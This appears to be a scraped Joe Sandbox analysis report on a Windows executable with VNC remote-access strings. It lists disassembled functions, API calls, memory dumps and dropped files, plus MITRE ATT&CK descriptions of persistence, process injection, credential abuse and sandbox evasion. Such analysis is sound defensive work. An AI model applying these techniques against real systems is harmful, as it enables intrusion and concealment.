String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
API String ID: 3439327939-3305976270
Opcode ID: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
Instruction ID: 2ef2b43aa49773a9c8dabdc5691df814034117bde6ef43bcdb062af3abb6407c
Opcode Fuzzy Hash: d1937ede65a235c7d2ec2112a920b07808cbcf2251c75e06a6bb4d56b5d8fc00
Instruction Fuzzy Hash: CE018B33A19B8086E720CB64E44126AF3A8FB94BA0F484335E6AA42B98CF7CD454C740

Function 00007FF67E7DE4B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32 ref: 00007FF67E7DE4E5
DeleteCriticalSection.KERNEL32 ref: 00007FF67E7DE503

Strings

vncclient.cpp : update thread gone, xrefs: 00007FF67E7DE511

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CriticalDeleteSection
String ID: vncclient.cpp : update thread gone
API String ID: 166494926-1446885542
Opcode ID: c70ae5ceed6a0217bc1349a0c22f1c8759ae68593431d1ea9294dd4061f560c0
Instruction ID: deb2eb46924bce010639dbc1935aaaaee0414d65c3adc755a0221a17c066180a
Opcode Fuzzy Hash: c70ae5ceed6a0217bc1349a0c22f1c8759ae68593431d1ea9294dd4061f560c0
Instruction Fuzzy Hash: D7018C36A28A8190E711DF14E9543B8B321FB54BA4F644231EA6D877E5EF3DE55EC300

Function 00007FF67E7CD8C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 00007FF67E7CD90B
GetLastError.KERNEL32 ref: 00007FF67E7CD915

Strings

{34F673E0-878F-11D5-B98A-00B0D07B8C7C}, xrefs: 00007FF67E7CD8EA

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CreateErrorFileLastMapping
String ID: {34F673E0-878F-11D5-B98A-00B0D07B8C7C}
API String ID: 1790465270-3305976270
Opcode ID: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
Instruction ID: 50681e4c3a985672461700b9a5a0f7de385639564af8b43bfe9b1113224d109c
Opcode Fuzzy Hash: dbcc6fba753eff514446a0364bbb8b9bc7cf6d08a70ced7c788015d2b9f2cd1e
Instruction Fuzzy Hash: 01018F33618AC182E7618B28E44036AB7A4E754374F588334F7BA426E8DF7CC498C711

Function 00007FF67E7EF6F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32 ref: 00007FF67E7EF719
PostMessageA.USER32 ref: 00007FF67E7EF765

Strings

WindowsScreenSaverClass, xrefs: 00007FF67E7EF733

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ClassMessageNamePost
String ID: WindowsScreenSaverClass
API String ID: 650004062-352026012
Opcode ID: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
Instruction ID: b6a6f051688fefe1ad3ce77c82519a7d70ba4fec688fc03dce53aea97b5e14c3
Opcode Fuzzy Hash: ffc7696b1c0006f253adaaa31f662de761ee3bb9df9a87c81459a5f9d86df577
Instruction Fuzzy Hash: 90014F32B28A9581F7718B15F8147EAA394FB9CB84F800131EA8C47B98DE3CE159CB00

Function 00007FF67E7E89E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31synchronizationwindowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32 ref: 00007FF67E7E8A29
WaitForSingleObject.KERNEL32 ref: 00007FF67E7E8A36

Strings

vncclient.cpp : client Kill() called, xrefs: 00007FF67E7E89ED

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: MessageObjectSendSingleWait
String ID: vncclient.cpp : client Kill() called
API String ID: 353115698-1198714380
Opcode ID: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
Instruction ID: 19b13025679b1bcdf4804d3d01cd64dbd5feb6e197dfb4e87f086fa842d2b5a3
Opcode Fuzzy Hash: 0f203efc3d92cf8d5df219f435c3488083d109424bac7753846dae75abe6381d
Instruction Fuzzy Hash: E3017C33A2498181FB58DF65E4453A96365EFA8B64F584331EA398A6D5CF3CD498C380

Function 00007FF67E7C6760 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(?,?,?,?,?,00007FF67E7C61EF), ref: 00007FF67E7C67A4
RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF67E7C61EF), ref: 00007FF67E7C67C1

Strings

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009, xrefs: 00007FF67E7C678B

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: CloseOpen
String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Hotfix\Q246009
API String ID: 47109696-713323490
Opcode ID: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
Instruction ID: 4aa71e113a671129f602818cbac69ca74c807e2f11cd39c5b7ed41ef78ca8146
Opcode Fuzzy Hash: 2ffe4356ded92a3a12c34227f40b863e036080daa4a6f7c6b14700cb5677b520
Instruction Fuzzy Hash: 1FF06223A2868181EB108B29E44426AA3A8FF75B98F644135EA8D477B4DF6ED099C705

Function 00007FF67E82CEF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

getpeername.WS2_32 ref: 00007FF67E82CF19
inet_ntoa.WS2_32 ref: 00007FF67E82CF23

Strings

<unavailable>, xrefs: 00007FF67E82CF2E

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: getpeernameinet_ntoa
String ID: <unavailable>
API String ID: 1982201544-1096956887
Opcode ID: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
Instruction ID: ccc36f88a8ea6130916b21ed3631e94432602dda81c203fb9da77b6bd8bbf77f
Opcode Fuzzy Hash: 5c4993396a7e2dabc89e2e5b10100f8684576445ded950f332601a8c5eebb03d
Instruction Fuzzy Hash: 46F01262A2874195EA619B10E891269B364FBA8798F801535F54E47764DF3CE24DCB00

Function 00007FF67E831740 Relevance: 5.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E8336C0: malloc.LIBCMT ref: 00007FF67E8336CB

free.LIBCMT ref: 00007FF67E831777

Part of subcall function 00007FF67E878BF4: RtlFreeHeap.NTDLL(?,?,?,00007FF67E87748C), ref: 00007FF67E878C0A
Part of subcall function 00007FF67E878BF4: _errno.LIBCMT ref: 00007FF67E878C14
Part of subcall function 00007FF67E878BF4: GetLastError.KERNEL32(?,?,?,00007FF67E87748C), ref: 00007FF67E878C1C

free.LIBCMT ref: 00007FF67E8317A0

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: free$ErrorFreeHeapLast_errnomalloc
String ID:
API String ID: 1225357528-0
Opcode ID: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
Instruction ID: b57a070f695445a3b4ceb8fd7faa8cf679480580165050da0d574a1bd4b54f99
Opcode Fuzzy Hash: 565a491ae928519ec85caab6d3bd3699c487abe761962c68358d79beabe01652
Instruction Fuzzy Hash: A6118E12F3C58242EA44A776B25177E92519F98FC0F485030FE4E8BB8BDE2CD4898704

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use bootkits to persist on systems. Bootkits reside at a layer below the operating system and may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.
Tactics:	Defense Evasion, Persistence
Data Sources:	Drive: Drive Modification
Platforms:	Linux, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 7q551ugrWe.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\146c4822-b7bb-4091-90ee-fca5ee58ec03.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF3f9f2b.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\abfffe4c-54d7-4818-90e8-bf9790d6e8bd.tmp

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241223123946Z-194.bmp

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Windows Analysis Report
7q551ugrWe.exe

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as `sc query` , `tasklist /svc` , `systemctl --type=service` , and `net start` .
Tactics:	Discovery
